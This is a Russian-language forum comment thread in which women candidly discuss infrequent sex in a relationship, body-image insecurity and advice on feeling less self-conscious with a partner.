Вот так почитаешь и ужаснешься себе. Мы молоды и живем всего три года, а секса у нас кот наплакал. И ведь осознаю, что я виновник и все никак не перебороть себя. Смешно сказать, но все это мои тараканы: кажется, что я не идеальна и мужчина мой меня разлюбит. Почитав ваши комментарии понимаю, что разлюбит он меня скоро по другому поводу. Ругается со мной из-за недостатка постоянно
Дарья Кондратьева, Вам вообще отдельный респект. Вы для меня прям олицетворение женской сексуальности в отношениях( не поймите неправильно, просто не первый раз вы пишете о сексе в комментариях и всегда так открыто и с любовью, что сразу ясно - все отлично в вашей паре )
Дарья Кондратьева написал:
ах... какой это был туман, Боже ты мой... а какие были лучи..."

поверьте, подобных воспоминаний о поцелуях и лучах хватит ни на одного человека. тех, что у меня имеются. и весь этот романтик рассеивающийся утром мне на фиг не нужен. уже выросла из этого возраста. 
Дарья Кондратьева написал:
я сделаю и не буду потом жалеть

ключевое не буду жалеть, а если точно знаешь,что буду?
Когда не буду то это мое правило теряет силу. Но такое, как уже было сказано было один раз. Это была чумачедшая любовь с первого взгляда. Искренне всем желаю испытать нечто подобное в жизни. Так что размениваться на что то меньшее неи желания.
Олеся написал:
Искренне всем желаю испытать нечто подобное в жизни.

)))) спасибо, но надеюсь, что мне это больше не понадобится. Надеюсь, что мы с мужем будем жить долго и счастливо и умрем в один день (очень нескоро). А так, конечно, приятно вспоминать то, что было в бурной юности ))) как все это щекотало нервы, как всюду замирало, как чувствовала себя волшебно и чудесно - при каждой "влюбленности с первого взгляда". Правда, я никогда не собиралась выходить замуж и строить серьезные отношения. Мой муж - первый мужчина, которому я осталась верна навсегда и с которым мне не захотелось расставаться. До него быть верной у меня не получалось, потому я быстро прерывала отношения - не люблю лгать, тем более, это было незачем - я же не собиралась строить "серьезные отношения".
Ирина Винна написал:
все это мои тараканы: кажется, что я не идеальна и мужчина мой меня разлюбит

Ирин, а что за тараканы-то? Хотите быть идеалом - будьте. Только, идеалом надо быть именно для мужчины, а не для себя - вот и выясните, что именно ему нужно? А если не можете выяснить, то узнайте это экспериментальным путем - пробуйте себя в разных образах . Иногда будьте флиртушкой-игрушкой, иногда строгой и уверенной, властной и жестокой,  наивной и неопытной, озабоченной и на все готовой, крутой мастерицей в сексуальных делах. Будет весело!
Дарья Кондратьева написал:
Иногда будьте флиртушкой-игрушкой, иногда строгой и уверенной, властной и жестокой, наивной и неопытной, озабоченной и на все готовой, крутой мастерицей в сексуальных делах. Будет весело!

Да уж. Навеяли вы. Мой МЧ никак не мог понять, как во мне одной столько женщин уживается. А я не одна такая, оказывается.
Дарья Кондратьева написал:
спасибо, но надеюсь, что мне это больше не понадобится.

Я это в общем то не вам. А вам желаю долгой и счастливой супружеской жизни.
Ирина Винна 05.11.2015 18:41
Дарья Кондратьева написал:
Ирин, а что за тараканы-то? Хотите быть идеалом - будьте. Только, идеалом надо быть именно для мужчины, а не для себя - вот и выясните, что именно ему нужно?

Да это все моя закомплексованность: при отличных параметрах и весе все равно стесняюсь себя, все думаю что бы еще исправить и тогда можно будет не стесняться. К мозгоправу мне надо, видимо, ибо мужчина мой фигуру мою боготворит, да я и сама понимаю, что дурная голова покоя не дает, но перебороть себя каждый раз тяжело
Дарья Кондратьева написал:
Иногда будьте флиртушкой-игрушкой, иногда строгой и уверенной, властной и жестокой, наивной и неопытной, озабоченной и на все готовой, крутой мастерицей в сексуальных делах. Будет весело


А Вы все таки удивительной открытости женщина! Спасибо за советы. Буду бороться со своей закомплексованностью прям с сегодняшнего дня А то так всю молодость пропущу
Ирина Винна написал:
мужчина мой фигуру мою боготворит, да я и сама понимаю, что дурная голова покоя не дает

мужчины, в действительности, занимаются любовью не с фигурой, а с головой ))) точнее, с Вашей личностью. С фигурой это интересно на раз или два, а потом приедается ))) В сексе нельзя стесняться, держать спину ровно, вздыхать мелодично, принимать красивые позы и думать о правильном выражении лица и вообще, как выглядишь, в процессе или в момент оргазма - это все портит, делает секс фальшивым.
Ирина Винна 05.11.2015 20:39
Дарья Кондратьева написал:
мужчины, в действительности, занимаются любовью не с фигурой, а с головой ))) точнее, с Вашей личностью.

Вот это точно.
Дарья Кондратьева написал:
В сексе нельзя стесняться, держать спину ровно, вздыхать мелодично, принимать красивые позы и думать о правильном выражении лица

И тут Вы правы. Именно поэтому у нас с мужчиной все редко: наигранности у нас нет, все прекрасно в процессе, но каждый раз я преодолеваю психологический барьер из страха перед началом
Звучит как полная дурь, знаю. Буду бороться. Данная тема и то, что столько разных людей, но все любят друг друга и счастливы, кто чаще, кто реже, но без заморочек - меня это вдохновило!
Интересные блоги
Лучшие рационы
Новые рецепты